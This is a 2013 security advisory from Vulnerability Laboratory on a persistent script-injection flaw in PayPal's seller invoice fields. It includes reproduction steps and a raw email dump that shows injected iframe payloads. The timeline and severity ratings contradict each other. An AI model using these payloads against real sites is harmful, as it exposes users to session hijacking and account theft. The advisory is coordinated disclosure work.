Lucene search

K
vulnerlabVulnerability Laboratory [Research Team] - Ibrahim M. El-Sayed [the_storm] ([email protected])VULNERABLE:645
HistoryMar 27, 2013 - 12:00 a.m.

Paypal Bug Bounty #6 - Persistent Web Vulnerability

2013-03-2700:00:00
Vulnerability Laboratory [Research Team] - Ibrahim M. El-Sayed [the_storm] ([email protected])
www.vulnerability-lab.com
7
Document Title:
===============
Paypal Bug Bounty #6 - Persistent Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=645

PayPal Security UID: ydh14ayfu


Release Date:
=============
2013-03-27


Vulnerability Laboratory ID (VL-ID):
====================================
645


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account 
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United 
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers 
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation 
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a Web Vulnerability in the official Paypal plaze ecommerce website application.


Vulnerability Disclosure Timeline:
==================================
2012-07-01:	Researcher Notification & Coordination
2012-07-02:	Vendor Notification
2012-08-13:	Vendor Response/Feedback
2012-03-26:	Vendor Fix/Patch
2012-03-27:	Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Core Application 2012 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A persistent input validation vulnerability is detected in the official Paypal ecommerce website content management system for sellers.
The bug allows remote attackers to implement/inject own malicious script code on the application-side (persistent) of the paypal web service. 
The persistent vulnerability is located in the Seller Invoice module with the bound vulnerable sent an invoice, your invoice, subject, 
sent to & invoice number parameters. The vulnerability can be exploited by remote attackers with low required user inter action and 
privileged seller account. Successful exploitation of the vulnerability can lead to session hijacking (admin), account steal via 
persistent web attack or stable (persistent) context manipulation.

Vulnerable Section(s):
                          [+] Seller

Vulnerable Module(s):
                          [+] Invoice - Listing

Vulnerable Parameter(s):
                          [+] sent an invoice
                          [+] your invoice
                          [+] subject
                          [+] sent to
                          [+] invoice number field


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with Business (Seller) Account & low required user inter action.
For demonstration or reproduce ...

1. To reproduce the vulnerability, the remote attacker (seller) creates an invoice by going to [Request Money] -> Create invoice
2. He injects in the input fields of sent an invoice, your invoice, subject, sent to & invoice number field own malicious script code  like js or html
3. In Send to field, the attacker can choose the mails of users on paypal to send them directly the malicous invoice
4. When the user checks his inbox the malicious script code (html/js) gets executed [persistent] out of the listing web context


Review: 

<tr>
<td>Subject:  </td><td> You sent an invoice (``>``<iframe src=``devscr-Dateien/a.x`` to<=`` td=``>
</tr>
</table>	
<div id=``email_body`` style=``height:300px``>
<textarea style=``border:0; width:98%; height:300px; overflow:visible`` readonly=``readonly``> 	

----NextPart_048F8BC8A2197DE2036A
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=windows-1252

----------------------------------------------------------------------
You sent an invoice
----------------------------------------------------------------------
Hello =22>=22<iframe src=3Dhttp://www.vuln-lab.com></iframe>,

Your invoice (=22>=22<iframe src=``devscr-Dateien/www.htm`` was=`` just=`` sent=`` to=``">"<
iframe`` ==`` please=`` note=`` that=`` it=`` may=`` take=`` a=`` few=`` moments=`` for=`` this=`` 
transaction=`` 
appear=``in`` your=`` account.=`` see=`` invoice:=``https://www.sandbox.paypal.com/us/cgi-bin/?cmd=3D_inv-details
&id=3DINV2-6G2=`` h-qwaa-ajup-rhnv=`` -------------------------------------------------------------
---------=`` ">"<iframe=``src=3Dhttp://www.vuln-lab.com></iframe>=22``>=22<iframe =
src=3Dhttp://www.vuln-lab.com></iframe>
=22>=22<iframe src=``devscr-Dateien/www_003.htm``></iframe>

----------------------------------------------------------------------
Summary of your invoice
----------------------------------------------------------------------
Sent to: ``>``<iframe =
src=3Dhttp://www.vuln-lab.com></iframe>
test=40test.com
Sent from: =22>=22<iframe src=``devscr-Dateien/www_003.htm``></iframe>
the_st_1341106590_biz=40mail.com
Invoice number: =22>=22<iframe src=``devscr-Dateien/www_004.htm`` date=`` payment=`` is=`` due:=`` jun=`` 30,=`` 2012=
`` amount:=``244.00`` usd=`` see=`` the=`` invoice=`` as=`` your=`` recipient=`` sees=`` it=`` :=``
https://www.sandbox.paypal.com/us/cgi-bin/?cmd=3D_pay-inv&id=3DINV2-6G2H-QW=`` aa-ajup-rhnv=``20`
` ----------------------------------------------------------------------=`` help=`` center:=``20`` https:=`` www.sandbox.paypal.com=``
`` us=`` cgi-bin=`` helpweb?cmd=``3D_help`` security=`` please=`` don't=`` reply=`` to=`` this=`` email.=`` it'll=``
`` just=`` confuse=`` computer=`` that=``sent`` and=`` you=`` won't=`` get=`` a=`` response.=``
`` copyright=``A9`` paypal,=`` inc.=`` all=`` rights=`` reserved.=`` paypal=`` located=`` at=``2211`` n.=``
`` first=`` st.,=`` san=`` jose,=`` ca=`` 95131.=``20`` email=`` id=`` pp1558=`` ----nextpart_048f8bc8a2197de2036a=``
`` content-transfer-encoding:=`` quoted-printable=`` content-type:=`` text=`` html;=`` charset=``windows-1252`` <html=``><head
 title=3D=22PayPal=22/><body><div 
class=3D=22ppmail=22><style =
type=3D=22text/css=22>=23emailWrapperTable h1, =23emailWrapperTable 
h2 =
=7Bfont-family:Verdana,Arial;margin-bottom:2px; font-size:15px;=7D
=23emailWrapperTable h3 =7Bfont-size:13px;=7D
=23emailWrapperTable h4 =7Bfont-size:11px;=7D
a =7Bcolor:=23084482; text-decoration:underline;=7D
hr =7Bdisplay: none;=7D
=2Esmall =7Bfont-size:10px;=7D
=2Eppid =7Bcolor:=23757575;=7D
p =7Bmargin:11px 0; padding:0;=7D
</style>
<=21--=5Bif gte mso 9=5D><style>.outlookFix 
=7Bfont-size:11px =
=21important;=7D</style><=21=5Bendif=5D-->


<table border=3D=220=22 cellpadding=3D=220=22 cellspacing=3D=220=22 =
id=3D=22emailWrapperTable=22 style=3D=22font:11px Verdana, Arial, =
Helvetica, sans-serif;color:=23333;=22 width=3D=22580=22><tr =
valign=3D=22top=22><td colspan=3D=223=22><table 
border=3D=220=22 =
cellpadding=3D=220=22 cellspacing=3D=220=22 width=3D=22100%=22 =
style=3D=22margin-bottom:10px;=22><tr 
valign=3D=22bottom=22><td =
align=3D=22left=22 width=3D=22253=22><span> 
</span></td><td =
align=3D=22right=22 style=3D=22padding:0 4px 4px 0;=22><span =
style=3D=22font:12px arial;font-style: italic;color: 
=23757575;=22>Powered =
by</span></td><td align=3D=22left=22 width=3D=2289=22 =
style=3D=22padding-right:13px;=22><img align=3D=22center=22 =
height=3D=2220=22 =
src=3D=22http://www.sandbox.paypal.com/en_US/i/logo/logo_paypal_76w_20h.gif=
=22
 border=3D=220=22 =
alt=3D=22PayPal=22/></td></tr><tr><td/>
</tr></table></td></tr><tr><td
 =
colspan=3D=223=22><img height=3D=2213=22 =
src=3D=22http://www.sandbox.paypal.com/en_US/i/scr/scr_emailTopCorners_580w=
x13h.gif=22
 border=3D=220=22 style=3D=22vertical-align:bottom=22 =
alt=3D=22=22/></td></tr><tr><td width=3D=2212=22
 =
style=3D=22background:url(/i/scr/scr_emailLeftBorder_13wx1h.gif) left =
repeat-y;border-left: 1px solid =23ddd;=22><i		


Security Risk:
==============
The security risk of the persistent script code inject web vulnerability is estimated as medium(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team]  -    Ibrahim M. El-Sayed [the_storm] ([email protected])



Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2013 | Vulnerability Laboratory